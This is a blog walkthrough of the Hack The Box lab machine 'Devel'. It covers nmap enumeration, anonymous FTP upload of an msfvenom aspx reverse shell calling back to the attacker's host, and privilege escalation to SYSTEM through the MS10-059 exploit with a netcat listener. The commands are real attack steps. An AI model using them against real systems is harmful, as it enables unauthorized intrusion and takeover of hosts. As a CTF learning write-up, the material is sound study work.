Devel

2020-02-16 12:13:55 +0000

devel

Hi, lets get stuck in…

Im settling on a good ‘less intrusive’ nmap command to start enumeration of a machine with…

nmap -sV -Pn --min-rate 10000 -p- 10.10.10.5 |tee -a dev.txt

Often depending on the results, ill run -sC or --script=vuln either on specific ports, or the default range.


Nmap scan report for 10.10.10.5
Host is up (0.092s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

In this case, its not really necessary, we can just manually test the target’s ftp port to see if it will allow anonymous login.

ftp 10.10.10.5 then use the username anonymous with any password like aosdidhf, and we got access.

A test to upload random text.txt file is successful, so we can potentially upload a reverse-shell of some sort to get a command shell on the target.

############################

The website on port 80 displays the Welcome page we found in the ftp directory… The target is running an aspnet client, which means if we upload an evil.aspx file, we can browse to it on port 80 to trigger it.

So lets first use MSFvenom to craft an evil.aspx reverse-shell file… msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.19 lport=443 -f aspx -o evil.aspx

In main ftp (root directory) put evil.aspx

Now just browse to http://10.10.10.5/evil.aspx to execute.

##################################

So we got a windows cli shell, and we need to escalate our privilages to get ntauthority/system to enable us to read root.txt in the Administrator’s Desktop.

Now’s a handy time to get familiarized with windows-exploit-suggester.py.

First we need to do is run the command systeminfo then copy’n’paste the results onto our kali machine into a text-file, in this case called sysinfo.txt.


Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:   
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31 ��
System Boot Time:          29/1/2020, 5:13:44 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 720 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.546 MB
Virtual Memory: In Use:    501 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5

Read the python program first for instructions …


# USAGE
,# 
# update the database
#
# $ ./windows-exploit-suggester.py --update
# [*] initiating...
# [*] successfully requested base url
# [*] scraped ms download url
# [+] writing to file 2014-06-06-mssb.xlsx
# [*] done
#
# install dependencies
#
# (install python-xlrd, $ pip install xlrd --upgrade)
#
# feed it "systeminfo" input, and point it to the microsoft database
#
# $ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

The result of following these instructions, is a list of potential methods of privilage escalation.

In this case we chose ms10-059 (chimichurri.exe)

Upload it again via ftp. Then transfer it to a place we can execute it. I often create a directory in C: to work from (which I can remove later) mkdir c:\boo

Before we execute the evil.exe, lets get a listener running on kali to catch the shell… nc -nlvp 999

Then on the target run… c:\boo\evil.exe 10.10.14.19 999


root@kali:~/HTB/retired/devel# nc -nlvp 999
listening on [any] 999 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.5] 49162
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\boo>whoami
whoami
nt authority\system

From here it is trivial to navigate to the user and Admin Desktops to get the user.txt.txt and root.txt.txt files. read them with the type command. eg.type root.txt.txt

The scenario is a simple one, but still encountered ‘in the wild’, and the widows-exploit-suggester.py’ is definately a handy tool to have in your armoury.

:)

me

My name is sh1n0bi,Welcome to my blog! Im currently writing up some HTB walkthroughs

Posts: